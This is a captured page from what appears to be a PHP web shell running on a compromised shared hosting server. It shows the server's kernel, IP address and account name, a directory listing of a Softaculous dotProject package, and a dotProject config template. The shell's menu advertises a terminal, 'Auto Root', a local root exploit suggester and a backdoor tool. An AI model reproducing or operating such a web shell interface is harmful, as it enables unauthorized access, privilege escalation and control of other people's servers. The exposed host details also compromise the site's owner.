Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
dotproj /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php53
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php56
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php71
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php81
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
php82
[ DIR ]
drwxr-xr-x
2024-11-28 21:50
clone.php
3.18
KB
-rw-r--r--
2024-05-02 10:59
config.php
802
B
-rw-r--r--
2021-12-23 11:54
edit.php
4.38
KB
-rw-r--r--
2024-05-02 10:59
edit.xml
433
B
-rw-r--r--
2021-12-23 11:54
fileindex.php
198
B
-rw-r--r--
2021-12-23 11:54
import.php
3.28
KB
-rw-r--r--
2024-05-02 10:59
info.xml
2.42
KB
-rw-r--r--
2024-05-02 10:25
install.js
921
B
-rw-r--r--
2021-12-23 11:54
install.php
3.84
KB
-rw-r--r--
2024-05-02 10:59
install.xml
1.24
KB
-rw-r--r--
2021-12-23 11:54
md5
2
KB
-rw-r--r--
2024-05-02 10:59
notes.txt
106
B
-rw-r--r--
2021-12-23 11:54
upgrade.php
2.87
KB
-rw-r--r--
2024-05-02 10:59
upgrade.xml
299
B
-rw-r--r--
2021-12-23 11:54
Save
Rename
<?php if (!defined('DP_BASE_DIR')) { die('You should not access this file directly.'); } ### Copyright (c) 2004, The dotProject Development Team dotproject.net and sf.net/projects/dotproject ### ### All rights reserved. Released under GPL License. For further Information see LICENSE ### ### CONFIGURATION FILE AUTOMATICALLY GENERATED BY THE DOTPROJECT INSTALLER ### ### FOR INFORMATION ON MANUAL CONFIGURATION AND FOR DOCUMENTATION SEE ./includes/config-dist.php ### $dPconfig['dbtype'] = 'mysqli'; $dPconfig['dbhost'] = '[[softdbhost]]'; $dPconfig['dbname'] = '[[softdb]]'; $dPconfig['dbprefix'] = '[[dbprefix]]'; $dPconfig['dbuser'] = '[[softdbuser]]'; $dPconfig['dbpass'] = '[[softdbpass]]'; $dPconfig['dbpersist'] = false; $dPconfig['root_dir'] = $baseDir; $dPconfig['base_url'] = $baseUrl; ?>